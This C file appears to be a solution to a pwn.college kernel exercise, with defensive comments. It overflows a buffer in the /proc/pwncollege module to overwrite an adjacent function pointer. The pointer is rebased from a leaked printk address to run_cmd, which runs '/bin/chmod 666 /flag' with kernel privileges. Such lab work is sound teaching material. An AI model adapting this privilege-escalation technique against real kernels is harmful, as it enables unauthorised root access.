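/*
 * User-space proof of concept for the pwn.college kernel exercise that
 * exposes /proc/pwncollege.
 *
 * What the program does, as far as this listing shows:
 *   1. writes 256 filler bytes to the proc entry;
 *   2. reads one hexadecimal kernel address from stdin (printk_addr);
 *   3. rebases a second address from it using two fixed constants;
 *   4. stores that address in the function-pointer field that follows the
 *      256-byte buffer, puts a command string in the buffer, and writes the
 *      struct to the proc entry.
 *
 * Defensive reading: presumably the kernel module copies the written bytes
 * into an object with this same layout without capping the length at the
 * buffer size, which lets user data reach the adjacent function pointer.
 * The module is not shown on this page, so confirm against its source.
 * The kernel-side fix for that class of bug is to bound the copy to the
 * buffer size. Step 2 only works when a kernel text address is visible to
 * the caller; restricting that exposure (kptr_restrict, dmesg_restrict) and
 * enforcing control-flow integrity on indirect calls reduce the impact.
 *
 * NOTE(review): the header names were lost when this page was extracted
 * (the source shows seven bare `#include` tokens). The list below is what
 * the code needs in order to compile, not necessarily the original list.
 */
#include <fcntl.h>
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Mirrors the layout the program writes: a buffer followed by a pointer. */
struct evil {
    char buffer[256];
    int (*log_function)(const char *, ...);
} s;

/* Command placed in the buffer by the final write. */
static const char command[] = "/bin/chmod 666 /flag";
_Static_assert(sizeof command <= sizeof s.buffer,
               "command must fit in the buffer including its terminator");

/*
 * Returns 0 when the final write succeeded, 1 on any setup or I/O failure.
 */
int main(void)
{
    int rc = 0;

    int fd = open("/proc/pwncollege", O_WRONLY);
    if (fd < 0) {
        perror("open /proc/pwncollege");
        return 1;
    }

    /* First write: buffer only, the pointer field is not sent. */
    memset(s.buffer, '0', sizeof s.buffer);
    if (write(fd, &s, sizeof s.buffer) < 0) {
        /* Reported but not fatal, matching the original best-effort flow. */
        perror("write (buffer only)");
    }

    /* SCNx64 is the matching conversion for uint64_t; "%llx" is not on LP64. */
    uint64_t printk_addr;
    if (scanf("%" SCNx64, &printk_addr) != 1) {
        fprintf(stderr, "expected one hexadecimal address on stdin\n");
        close(fd);
        return 1;
    }

    /*
     * Only the difference between the two constants matters. They are
     * presumably the two symbols' addresses taken from one boot of one
     * kernel build, so they are not portable; the page labels the second
     * one run_cmd.
     */
    const uint64_t ref_base = UINT64_C(0xffffffffb90b69a9);
    const uint64_t ref_run_cmd = UINT64_C(0xffffffffb9089b30); /* run_cmd */

    /* Integer to function pointer needs an explicit cast to be valid C. */
    s.log_function = (int (*)(const char *, ...))(uintptr_t)
        (printk_addr - ref_base + ref_run_cmd);
    printf("%" PRIx64 "\n", (uint64_t)(uintptr_t)s.log_function);

    /*
     * run_cmd doesn't use stdin or stdout, and it doesn't use the current
     * working directory: its CWD is /. The executable should therefore be
     * given by absolute path.
     */
    memcpy(s.buffer, command, sizeof command);

    /*
     * Sends every byte of the struct except the last one; the page does
     * not say why the final byte is left out.
     */
    if (write(fd, &s, sizeof(struct evil) - 1) < 0) {
        perror("write (struct)");
        rc = 1;
    }

    close(fd);
    return rc;
}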